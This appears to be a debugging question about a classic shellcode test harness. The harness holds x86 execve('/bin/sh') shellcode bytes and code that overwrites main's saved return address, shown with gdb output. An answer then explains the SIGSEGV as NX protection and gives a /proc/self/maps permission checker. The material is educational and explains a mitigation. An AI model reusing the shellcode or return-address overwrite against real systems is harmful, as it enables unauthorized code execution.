```c
/* Classic shellcode test harness (Aleph One's testsc.c style). */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(void) {
    int *ret;
    /* Point ret at main's saved return address on the stack (ebp+4 on
       32-bit x86, assuming ret itself is the local at ebp-4) and overwrite
       it with the address of shellcode[], so main's ret jumps there. */
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
    return 0;
}
```
```text
(gdb) disassemble main
Dump of assembler code for function main:
   0x08048250 <+0>:   push %ebp
   0x08048251 <+1>:   mov %esp,%ebp
   0x08048253 <+3>:   sub $0x10,%esp
   0x08048256 <+6>:   lea -0x4(%ebp),%eax
   0x08048259 <+9>:   add $0x8,%eax
   0x0804825c <+12>:  mov %eax,-0x4(%ebp)
   0x0804825f <+15>:  mov -0x4(%ebp),%eax
   0x08048262 <+18>:  mov $0x80c6020,%edx
   0x08048267 <+23>:  mov %edx,(%eax)
   0x08048269 <+25>:  leave
=> 0x0804826a <+26>:  ret
```
At `ret` it reports: Program received signal SIGSEGV, Segmentation fault.
The program is meant to perform a buffer overflow attack; up to 0x0804826a all the parameters are correct.
I guess the error occurs when the `ret` instruction loads the shellcode address into ip,
but I really don't know which programming rule this violates.
I'll paste all the debugging output I have.
Please advise.

```text
(gdb) info registers ebp
ebp            0xbffff438       0xbffff438
(gdb) x /32wx 0xbffff438
0xbffff438: 0xbffff4a8 0x080c6020 0x00000001 0xbffff4d4
0xbffff448: 0xbffff4dc 0x00000000 0x00000000 0x00000000
0xbffff458: 0x00000000 0x00000000 0x00000000 0x080488b0
```

The return address after ebp is 0x080c6020.

```text
(gdb) x /32wx 0x080c6020
0x80c6020 <shellcode>: 0x895e1feb 0xc0310876 0x89074688 0x0bb00c46
```

That address is also where I positioned the shellcode beforehand.
The strange thing is that as soon as it executes `ret`, it segfaults.
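A fault at `ret` with a correct return address is the signature of the target lying in a non-executable mapping. `shellcode[]` is an initialised, writable global, so it lives in the binary's data segment; on a kernel that enforces NX (W^X) that segment is mapped `rw-` rather than `r-x`, and the CPU faults on the very first instruction fetch after the `ret`, which is exactly the SIGSEGV seen above. The way to confirm this inside the faulting process is to look up the target address in `/proc/self/maps` and read its permission bits. The following is an added example, not code from the original post; it assumes Linux (for `/proc/self/maps`) and a default build, and `data_bytes[]` is a constructed stand-in for the post's `shellcode[]` that is placed in the data segment the same way.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Permissions of the /proc/self/maps entry that contains an address. */
struct map_perms {
    int found;              /* 1 if some mapping contains the address */
    int r, w, x;            /* read / write / execute bits of that mapping */
    unsigned long lo, hi;   /* mapping bounds */
};

/* Scan /proc/self/maps (Linux only, an assumption of this example) for the
 * mapping that contains addr and return its permission bits. */
struct map_perms lookup_perms(const void *addr) {
    struct map_perms p;
    memset(&p, 0, sizeof p);
    FILE *f = fopen("/proc/self/maps", "r");
    if (f == NULL)
        return p;
    unsigned long a = (unsigned long)(uintptr_t)addr;
    char line[512];
    while (fgets(line, sizeof line, f) != NULL) {
        unsigned long lo, hi;
        char perms[5];
        /* Each line begins "lo-hi perms ...", e.g. "08048000-0804a000 r-xp ..." */
        if (sscanf(line, "%lx-%lx %4s", &lo, &hi, perms) != 3)
            continue;
        if (a >= lo && a < hi) {
            p.found = 1;
            p.lo = lo;
            p.hi = hi;
            p.r = perms[0] == 'r';
            p.w = perms[1] == 'w';
            p.x = perms[2] == 'x';
            break;
        }
    }
    fclose(f);
    return p;
}

/* Returns 1 only if a jump or ret to addr would be allowed to fetch instructions. */
int can_execute_at(const void *addr) {
    struct map_perms p = lookup_perms(addr);
    return p.found && p.x;
}

/* Constructed stand-in for the post's shellcode[]: an initialised, writable
 * global, so the linker places it in the data segment just like shellcode[]. */
char data_bytes[] = "constructed bytes in .data, not executable code";

/* Address of a function (in .text) for comparison. */
const void *text_address(void) {
    return (const void *)(uintptr_t)&lookup_perms;
}

static void report(const char *what, const void *addr) {
    struct map_perms p = lookup_perms(addr);
    if (!p.found) {
        printf("%-12s %p: no mapping found\n", what, addr);
        return;
    }
    printf("%-12s %p: [%lx-%lx] %c%c%c -> ret here would %s\n", what, addr,
           p.lo, p.hi, p.r ? 'r' : '-', p.w ? 'w' : '-', p.x ? 'x' : '-',
           p.x ? "execute" : "SIGSEGV on the first instruction fetch");
}

int main(void) {
    report("function", text_address());
    report("data array", data_bytes);
    return 0;
}
```

On a default build the function address reports `r-x` and the data array `rw-`, so the same lookup applied to `0x080c6020` in the post's process would show why control transfer to that address cannot succeed: the overwrite of the saved return address worked exactly as the gdb dump shows, and it is the NX mapping of the data segment that stops execution there. This is the mitigation doing its job, and it is why modern toolchains keep data and code in separately permissioned mappings.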